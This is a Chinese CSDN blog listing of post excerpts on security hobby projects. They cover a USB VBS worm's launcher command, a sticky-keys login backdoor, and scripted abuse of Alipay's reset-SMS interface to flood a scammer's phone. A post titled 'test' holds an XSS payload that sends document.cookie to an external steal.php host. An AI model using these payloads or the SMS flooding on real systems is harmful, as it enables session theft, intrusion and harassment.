![](https://img-blog.csdnimg.cn/20201014180756780.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
网络安全
HeHH0626
这个作者很懒,什么都没留下…
展开
-
实验室缉毒记之uzgbtymhqo.vbs
去年的事情了,写下来记一下吧。周三在机房插上U盘后,周四的数据库上机发现U盘里所有东西都变成lnk,如下图:随便打开一个lnk内容如下:C:\windows\system32\cmd.exe /c start uzgbtymhqo.vbs&start explorer PowerDesigner15&exit主要是这个uzgbtymhqo.vbs不知道是干什么的。原创 2015-07-09 11:13:21 · 2485 阅读 · 1 评论 -
没有登录进windows时有什么进程在运行
前段时间讨论输入法漏洞导致无需密码直接进入系统的问题时,想到一个对策,就是在登陆进windows前,禁止陌生进程运行。据说当年微软拼音输入法漏洞时的修补方案就是限制自身的拼音输入法的某些功能。我们先看看没有登录进windows时有什么进程在运行。思路:如果有听过windows的粘滞键的话,应该会想到利用这个来实现。装一个5shift后门,然后再登陆界面把它呼唤出来,执行命令,把结果重定向到原创 2015-07-09 10:49:32 · 994 阅读 · 0 评论 -
http 基础认证(Basic Authentication)
还是几个月前的老东西。 计算机网络作业需要一个http基础认证的网站来学习http协议本身以及它的安全性。实在找不到这种网站,应该是过时了的技术吧。由于认证过程仅仅是Base64加密(其实这个不算加密吧,仅仅是把这些东西转换成MIME的格式方可在网络上面传输),而且每次都要带上这个认证信息的话,那是很不安全的。所以一般会是结合https一起,或者用其他认证方式,比如OA认证。好了,废话不说原创 2015-07-09 10:53:35 · 8944 阅读 · 0 评论 -
uzgbtymhqo.vbs服务器端测试代码编写
虽然是一个很小的vbs病毒,但是功能也是足够齐全的,会下载上传文件,删除文件,枚举进程,查看系统相关的信息,更新木马,查看磁盘目录及目录下的文件。苦于没有服务器端,自己动手写了一个。思路:用C++动态更新php文件内容,而php文件则作为客户端请求的响应脚本。如需执行命令只需在C++中输入即可。运行界面:服务器端目录如下:主控php代码:(在is-rec原创 2015-07-09 11:36:55 · 1504 阅读 · 0 评论 -
我是如何惩罚骗子的
这是去年的事了。偶然在朋友圈看到一条信息,说是分享点赞截图就送手机的。很可能是骗子。我就跟进了一下,果然是个骗子。骗邮费。如图拿这个邮箱去各种社工库都找不到任何相关的信息,也没查到注册信息。应该是一个专门骗钱的小号。最后想到在支付宝的登陆页面填写忘记密码,可以给手机发短信。于是就学了python,写了几句代码,达到了目的,由于接口限制,15分钟内只能发送原创 2015-07-09 17:02:18 · 3600 阅读 · 0 评论 -
从一个扫描十二宿所有在线主机的脚本扯起
几个月前的事了,现在写写博客。刚刚好在学网络,也学了一点批处理,于是写了一个bat,用来扫描12宿所有以太网在线的主机。(不论是路由还是电脑,只要连了有线)。闲的蛋疼的同学可以拿来玩玩。代码太挫,各位自己优化吧。最后扫描结果存在同目录下的12.txt下面。运行结果如下: 根据记事本上面显示的行数,可以算出回复ICMP应答报文的主机数。(设为X)则2+2*255*5+X+原创 2015-07-09 09:29:44 · 776 阅读 · 0 评论 -
test
<input id="hello" style="height:0px;width:0px" autofocus="" onfocusin="var image=new Image(); image.src='http://woaixiao.sinaapp.com/XSS/steal.php?cookie='+escape(document.cookie);document.getElemen原创 2015-09-22 16:10:11 · 422 阅读 · 0 评论 -
IDA 插件
plugin_t PLUGIN ={IDP_INTERFACE_VERSION, // IDA version plug-in is written for0, // Flags (see below)IDAP_init, // Initialisation functionIDAP_term, // Clean-up functionIDAP_run, // Main plug-in原创 2016-05-05 04:28:23 · 494 阅读 · 0 评论